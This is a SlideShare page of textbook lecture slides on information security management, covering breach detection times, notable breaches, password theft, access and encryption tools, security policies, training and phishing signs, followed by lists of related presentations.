SlideShare a Scribd company logo

ch07-Security.pptx

Download as PPTX, PDF
L
LuckySaigon1

This document summarizes key points from a chapter on security from the textbook "Managing and Using Information Systems: A Strategic Approach – Sixth Edition". It discusses how long it typically takes to detect security breaches (median of 205 days), compares the Hollywood depiction of breaches to reality (which can take months or years to detect), outlines a framework for IT security decision making, and summarizes how major breaches have occurred through stolen passwords or third party access. It also covers strategies for access controls, storage/transmission tools, security policies, training, and the costs and challenges of achieving complete security.

1 of 25
Managing and Using Information Systems: A Strategic Approach – Sixth Edition Keri Pearlson, Carol Saunders, and Dennis Galletta © Copyright 2016 John Wiley & Sons, Inc.
Chapter 7 Security
Opening Case • What are some important lessons from the opening case? • How long did the theft take? How did the theft likely occur? • How long did it take Office of Personnel Management (OPM) to detect the theft? • How damaging are the early reports of the data theft for the OPM? © 2016 John Wiley & Sons, Inc. 3
How Long Does it Take? • How long do you think it usually takes for someone to discover a security compromise in a system after the evidence shows up? A. Several seconds B. Several minutes C. Several hours D. Several days E. Several months A Mandiant study revealed that the median for 2014 was 205 days! That’s almost 7 months! The record is 2,982 which is 11 years! © 2016 John Wiley & Sons, Inc. 4
Timeline of a Breach - Fantasy • Hollywood has a fairly consistent script: • 0: Crooks get password and locate the file • Minute 1: Crooks start downloading data and destroying the original • Minute 2: Officials sense the breach • Minute 3: Officials try to block the breach • Minute 4: Crooks’ download completes • Minute 5: Officials lose all data Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf © 2016 John Wiley & Sons, Inc. 5
Timeline of a Breach - Reality Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf © 2016 John Wiley & Sons, Inc. 6
IT Security Decision Framework Decision Who is Responsible Why? Otherwise? Information Security Strategy Business Leaders They know business strategies Security is an afterthought and patched on Information Security Infrastructure IT Leaders Technical knowledge is needed Incorrect infrastructure decisions Information Security Policy Shared: IT and Business Leaders Trade-offs need to be handled correctly Unenforceable policies that don’t fit the IT and the users SETA (training) Shared: IT and Business Leaders Business buy-in and technical correctness Insufficient training; errors Information Security Investments Shared: IT and Business Leaders Evaluation of business goals and technical requirements Over- or under- investment in security © 2016 John Wiley & Sons, Inc. 7
How Have Big Breaches Occurred? Date Detected Company What was stolen How November 2013 Target 40 million credit & debit cards Contractor opened virus-laden email attachment May 2014 Ebay #1 145 million user names, physical addresses, phones, birthdays, encrypted passwords Employee’s password obtained September 2014 Ebay #2 Small but unknown Cross-site scripting September 2014 Home Depot 56 million credit card numbers 53 million email addresses Obtaining a vendor’s password/exploiting OS vulnerability January 2015 Anthem Blue Cross 80 million names, birthdays, emails, Social security numbers, addresses, and employment data Obtaining passwords from 5 or more high-level employees © 2016 John Wiley & Sons, Inc. 8
Password Breaches • 80% of breaches are caused by stealing a password. • You can steal a password by: • Phishing attack • Key logger (hardware or software) • Guessing weak passwords (123456 is most common) • Evil twin wifi © 2016 John Wiley & Sons, Inc. 9
Insecurity of WiFi– a Dutch study • “We took a hacker to a café and, in 20 minutes, he knew where everyone else was born, what schools they attended, and the last five things they googled.” • Had WiFi transmitter broadcasting “Starbucks” as ID • Because they were connected to him, he scanned for unpatched or vulnerable mobile devices or laptops • He also saw passwords and could lock them out of their own accounts. • The correspondent: “I will never again be connecting to an insecure public WiFi network without taking security measures.” © 2016 John Wiley & Sons, Inc. Slide 5-10
Other Approaches • Cross-site scripting (malicious code pointing to a link requiring log-in at an imposter site) • Third parties • Target’s HVAC system was connected to main systems • Contractors had access • Hackers gained contractors’ password • Malware captured customer credit card info before it could be encrypted © 2016 John Wiley & Sons, Inc. 11
Cost of Breaches • Estimated at $145 to $154 per stolen record • Revenue lost when sales decline • Some costs can be recouped by insurance © 2016 John Wiley & Sons, Inc. 12
Can You be Safe? • No, unless the information is permanently inaccessible • “You cannot make a computer secure” – from Dain Gary, former CERT chief • 97% of all firms have been breached • Sometimes security makes systems less usable © 2016 John Wiley & Sons, Inc. 13
What Motivates the Hackers? • Sell stolen credit card numbers for up to $50 each • 2 million Target card numbers were sold for $20 each on average • Street gang members can usually get $400 out of a card • Some “kits” (card number plus SSN plus medical information) sell for up to $1,000 • They allow opening new account cards • Stolen cards can be sold for bitcoin on the Deep Web © 2016 John Wiley & Sons, Inc. 14
What Should Management Do? • Security strategy • Infrastructure • Access tools * • Storage and transmission tools * • Security policies * • Training * • Investments * Described next © 2016 John Wiley & Sons, Inc. 15
Access Tools Access Tool Ubiquity Advantages Disadvantages Physical locks Very high • Excellent if guarded • Locks can be picked • Physical Access is often not needed • Keys can be lost Passwords Very high • User acceptance and familiarity • Ease of use • Mature practices • Poor by themselves • Sometimes forgotten • Sometimes stolen from users using deception or key loggers Biometrics Medium • Can be reliable • Never forgotten • Cannot be stolen • Can be inexpensive • False positives/negatives • Some are expensive • Some might change (e.g., voice) • Lost limbs • Loopholes (e.g., photo) © 2016 John Wiley & Sons, Inc. 16
Access Tools (continued) Access Tool Ubiquity Advantages Disadvantages Challenge questions Medium (high in banking) • Not forgotten • Multitude of questions can be used • Social networking might reveal some answers • Personal knowledge of an individual might reveal the answers • Spelling might not be consistent Token Low • Stolen passkey is useless quickly • Requires carrying a device Text message Medium • Stolen passkey is useless • Mobile phone already owned by users • Useful as a secondary mechanism too • Requires mobile phone ownership by all users • Home phone option requires speech synthesis • Requires alternative access control if mobile phone lost Multi-factor authentication Medium • Stolen password is useless • Enhanced security • Requires an additional technique if one of the two fails • Temptation for easy password © 2016 John Wiley & Sons, Inc. 17
Storage and Transmission Tools Tool Ubiquity Advantages Disadvantages Antivirus/ antispyware Very high • Blocks many known threats • Blocks some “zero-day” threats • Slow down operating system • “Zero day” threats can be missed Firewall High • Can prevent some targeted traffic • Can only filter known threats • Can have well-known “holes” System logs Very high • Can reveal IP address of attacker • Can estimate the extent of the breach • Hackers can conceal their IP address • Hackers can delete logs • Logs can be huge • Irregular inspections System alerts High • Can help point to logs • Can detect an attack in process • High sensitivity • Low selectivity © 2016 John Wiley & Sons, Inc. 18
Storage and Transmission Tools (continued) Tool Ubiquity Advantages Disadvantages Encryption Very high • Difficult to access a file without the key • Long keys could take years to break • Keys are unnecessary if password is known • If the key is not strong, hackers could uncover it by trial and error WEP/WPA Very high • Same as encryption • Most devices have the capability • Provides secure wifi connection • Same as encryption • Some older devices have limited protections • WEP is not secure, yet it is still provided VPN Medium • Trusted connection is as if you were connected on site • Hard to decrypt • Device could be stolen while connected • Sometimes slows the connection © 2016 John Wiley & Sons, Inc. 19
Security Policies • Perform security updates promptly • Separate unrelated networks • Keep passwords secret • Manage mobile devices (BYOD) • Formulate data policies (retention and disposal) • Manage social media (rules as to what can be shared, how to identify yourself) • Use consultants (Managed Security Services Providers) © 2016 John Wiley & Sons, Inc. 20
SETA (Security Education, Training, and Awareness) • Training on access tools • Limitations of passwords • Formulating a password • Changing passwords periodically • Using multi-factor authentication • Using password managers © 2016 John Wiley & Sons, Inc. 21
SETA (Security Education, Training, and Awareness) • BYOD • Rules • How to follow them • Social Media • Rules • How to follow them • Cases from the past that created problems © 2016 John Wiley & Sons, Inc. 22
SETA (Security Education, Training, and Awareness) • Vigilance: Recognizing: • Bogus warning messages • Phishing emails • Physical intrusions • Ports and access channels to examine © 2016 John Wiley & Sons, Inc. 23
Classic Signs of Phishing • Account is being closed • Email in-box is full • Winning a contest or lottery • Inheritance or commission to handle funds • Product delivery failed • Odd URL when hovering • Familiar name but strange email address • Poor grammar/spelling • Impossibly low prices • Attachment with EXE, ZIP, or BAT (etc.) © 2016 John Wiley & Sons, Inc. 24
Managing and Using Information Systems: A Strategic Approach – Sixth Edition Keri Pearlson, Carol Saunders, and Dennis Galletta © Copyright 2016 John Wiley & Sons, Inc.

Recommended

Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 
Online privacy & security
Online privacy & securityOnline privacy & security
Online privacy & security
Priyab Satoshi
 
Internet Issues (How to Deal on Internet Security)
Internet Issues (How to Deal on Internet Security)Internet Issues (How to Deal on Internet Security)
Internet Issues (How to Deal on Internet Security)
Hannah Jane del Castillo
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Accellis Technology Group
 
2015: The year-ahead-in-cyber-security
2015: The year-ahead-in-cyber-security2015: The year-ahead-in-cyber-security
2015: The year-ahead-in-cyber-security
Stephen Cobb
 
Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012
Andris Soroka
 
Cyber Security and Healthcare
Cyber Security and HealthcareCyber Security and Healthcare
Cyber Security and Healthcare
Jonathon Coulter
 
IT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptIT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.ppt
OoXair
 

Recommended

Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
Priyanka Aash
 
Online privacy & security
Online privacy & securityOnline privacy & security
Online privacy & security
Priyab Satoshi
 
Internet Issues (How to Deal on Internet Security)
Internet Issues (How to Deal on Internet Security)Internet Issues (How to Deal on Internet Security)
Internet Issues (How to Deal on Internet Security)
Hannah Jane del Castillo
 
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your DataLaw Firm Cybersecurity: Practical Tips for Protecting Your Data
Law Firm Cybersecurity: Practical Tips for Protecting Your Data
Accellis Technology Group
 
2015: The year-ahead-in-cyber-security
2015: The year-ahead-in-cyber-security2015: The year-ahead-in-cyber-security
2015: The year-ahead-in-cyber-security
Stephen Cobb
 
Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012Lumension Security - Adjusting our defenses for 2012
Lumension Security - Adjusting our defenses for 2012
Andris Soroka
 
Cyber Security and Healthcare
Cyber Security and HealthcareCyber Security and Healthcare
Cyber Security and Healthcare
Jonathon Coulter
 
IT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.pptIT Security Awareness-v1.7.ppt
IT Security Awareness-v1.7.ppt
OoXair
 
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
MansoorAhmed57263
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBCapyn
 
Personal Threat Models
Personal Threat ModelsPersonal Threat Models
Personal Threat Models
Geoffrey Vaughan
 
Judy Taylour's Digital Privacy Day 2014 Presentation
Judy Taylour's Digital Privacy Day 2014 PresentationJudy Taylour's Digital Privacy Day 2014 Presentation
Judy Taylour's Digital Privacy Day 2014 PresentationGreater Cleveland PC Users Group
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
SonakshiMundra
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber Security
Stephen Cobb
 
CCIAOR Cyber Security Forum
CCIAOR Cyber Security ForumCCIAOR Cyber Security Forum
CCIAOR Cyber Security Forum
CCIAOR
 
Security in the News
Security in the NewsSecurity in the News
Security in the NewsJames Sutter
 
Internet Security is an Oxymoron
Internet Security is an OxymoronInternet Security is an Oxymoron
Internet Security is an Oxymoron
Max Nokhrin
 
2014 ota databreach3
2014 ota databreach32014 ota databreach3
2014 ota databreach3Meg Weber
 
Users awarness programme for Online Privacy
Users awarness programme for Online PrivacyUsers awarness programme for Online Privacy
Users awarness programme for Online Privacy
Kazi Sarwar Hossain
 
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access ControlStopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
SecureAuth
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud Computing
Mitesh Katira
 
The Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 editionThe Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 edition
Stephen Cobb
 
Executive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdfExecutive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdf
TechSoup
 
The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.
Teri Radichel
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial Planners
Michael O'Phelan
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
Mohan Jadhav
 
Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....
Abzetdin Adamov
 
12990739.ppt
12990739.ppt12990739.ppt
12990739.ppt
MuhammadShahidulIsla8
 
C03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.pptC03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.ppt
LuckySaigon1
 
ABPMP BOK Overview.ppt
ABPMP BOK Overview.pptABPMP BOK Overview.ppt
ABPMP BOK Overview.ppt
LuckySaigon1
 

More Related Content

Similar to ch07-Security.pptx

itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
MansoorAhmed57263
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBCapyn
 
Personal Threat Models
Personal Threat ModelsPersonal Threat Models
Personal Threat Models
Geoffrey Vaughan
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
SonakshiMundra
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber Security
Stephen Cobb
 
CCIAOR Cyber Security Forum
CCIAOR Cyber Security ForumCCIAOR Cyber Security Forum
CCIAOR Cyber Security Forum
CCIAOR
 
Security in the News
Security in the NewsSecurity in the News
Security in the NewsJames Sutter
 
Internet Security is an Oxymoron
Internet Security is an OxymoronInternet Security is an Oxymoron
Internet Security is an Oxymoron
Max Nokhrin
 
2014 ota databreach3
2014 ota databreach32014 ota databreach3
2014 ota databreach3Meg Weber
 
Users awarness programme for Online Privacy
Users awarness programme for Online PrivacyUsers awarness programme for Online Privacy
Users awarness programme for Online Privacy
Kazi Sarwar Hossain
 
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access ControlStopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
SecureAuth
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud Computing
Mitesh Katira
 
The Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 editionThe Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 edition
Stephen Cobb
 
Executive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdfExecutive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdf
TechSoup
 
The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.
Teri Radichel
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial Planners
Michael O'Phelan
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
Mohan Jadhav
 
Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....
Abzetdin Adamov
 
12990739.ppt
12990739.ppt12990739.ppt
12990739.ppt
MuhammadShahidulIsla8
 

Similar to ch07-Security.pptx (20)

itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBC
 
Personal Threat Models
Personal Threat ModelsPersonal Threat Models
Personal Threat Models
 
Judy Taylour's Digital Privacy Day 2014 Presentation
Judy Taylour's Digital Privacy Day 2014 PresentationJudy Taylour's Digital Privacy Day 2014 Presentation
Judy Taylour's Digital Privacy Day 2014 Presentation
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber Security
 
CCIAOR Cyber Security Forum
CCIAOR Cyber Security ForumCCIAOR Cyber Security Forum
CCIAOR Cyber Security Forum
 
Security in the News
Security in the NewsSecurity in the News
Security in the News
 
Internet Security is an Oxymoron
Internet Security is an OxymoronInternet Security is an Oxymoron
Internet Security is an Oxymoron
 
2014 ota databreach3
2014 ota databreach32014 ota databreach3
2014 ota databreach3
 
Users awarness programme for Online Privacy
Users awarness programme for Online PrivacyUsers awarness programme for Online Privacy
Users awarness programme for Online Privacy
 
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access ControlStopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud Computing
 
The Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 editionThe Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 edition
 
Executive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdfExecutive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdf
 
The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial Planners
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....
 
12990739.ppt
12990739.ppt12990739.ppt
12990739.ppt
 

More from LuckySaigon1

C03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.pptC03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.ppt
LuckySaigon1
 
ABPMP BOK Overview.ppt
ABPMP BOK Overview.pptABPMP BOK Overview.ppt
ABPMP BOK Overview.ppt
LuckySaigon1
 
ch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.pptch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.ppt
LuckySaigon1
 
ch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.pptch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.ppt
LuckySaigon1
 
ch03-Design Project.ppt
ch03-Design Project.pptch03-Design Project.ppt
ch03-Design Project.ppt
LuckySaigon1
 
ch02-Improvement Program.ppt
ch02-Improvement Program.pptch02-Improvement Program.ppt
ch02-Improvement Program.ppt
LuckySaigon1
 
ch09-Simulation.ppt
ch09-Simulation.pptch09-Simulation.ppt
ch09-Simulation.ppt
LuckySaigon1
 
ch07-Extend.ppt
ch07-Extend.pptch07-Extend.ppt
ch07-Extend.ppt
LuckySaigon1
 
ch01-Design.ppt
ch01-Design.pptch01-Design.ppt
ch01-Design.ppt
LuckySaigon1
 
ch05-Flows.ppt
ch05-Flows.pptch05-Flows.ppt
ch05-Flows.ppt
LuckySaigon1
 
ch10-Optimizing.ppt
ch10-Optimizing.pptch10-Optimizing.ppt
ch10-Optimizing.ppt
LuckySaigon1
 
2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt
LuckySaigon1
 

More from LuckySaigon1 (12)

C03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.pptC03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.ppt
 
ABPMP BOK Overview.ppt
ABPMP BOK Overview.pptABPMP BOK Overview.ppt
ABPMP BOK Overview.ppt
 
ch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.pptch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.ppt
 
ch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.pptch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.ppt
 
ch03-Design Project.ppt
ch03-Design Project.pptch03-Design Project.ppt
ch03-Design Project.ppt
 
ch02-Improvement Program.ppt
ch02-Improvement Program.pptch02-Improvement Program.ppt
ch02-Improvement Program.ppt
 
ch09-Simulation.ppt
ch09-Simulation.pptch09-Simulation.ppt
ch09-Simulation.ppt
 
ch07-Extend.ppt
ch07-Extend.pptch07-Extend.ppt
ch07-Extend.ppt
 
ch01-Design.ppt
ch01-Design.pptch01-Design.ppt
ch01-Design.ppt
 
ch05-Flows.ppt
ch05-Flows.pptch05-Flows.ppt
ch05-Flows.ppt
 
ch10-Optimizing.ppt
ch10-Optimizing.pptch10-Optimizing.ppt
ch10-Optimizing.ppt
 
2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt
 

Recently uploaded

falcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-indiafalcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-india
Falcon Invoice Discounting
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
techboxsqauremedia
 
FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134
LR1709MUSIC
 
Recruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media MasterclassRecruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media Masterclass
LuanWise
 
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdfikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
agatadrynko
 
What is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdfWhat is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdf
seoforlegalpillers
 
5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer
ofm712785
 
Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...
dylandmeas
 
Project File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdfProject File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdf
RajPriye
 
The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...
Adam Smith
 
Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...
Lviv Startup Club
 
Cracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptxCracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptx
Workforce Group
 
Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111
zoyaansari11365
 
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBdCree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
creerey
 
LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024
Lital Barkan
 
The key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EUThe key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EU
Allensmith572606
 
Premium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern BusinessesPremium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern Businesses
SynapseIndia
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
FelixPerez547899
 
Brand Analysis for an artist named Struan
Brand Analysis for an artist named StruanBrand Analysis for an artist named Struan
Brand Analysis for an artist named Struan
sarahvanessa51503
 
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdfSearch Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Arihant Webtech Pvt. Ltd
 

Recently uploaded (20)

falcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-indiafalcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-india
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
 
FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134
 
Recruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media MasterclassRecruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media Masterclass
 
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdfikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
 
What is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdfWhat is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdf
 
5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer
 
Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...
 
Project File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdfProject File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdf
 
The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...
 
Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...
 
Cracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptxCracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptx
 
Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111
 
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBdCree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
 
LA HUG - Video Testimonials with Chynna Morgan - June 2024
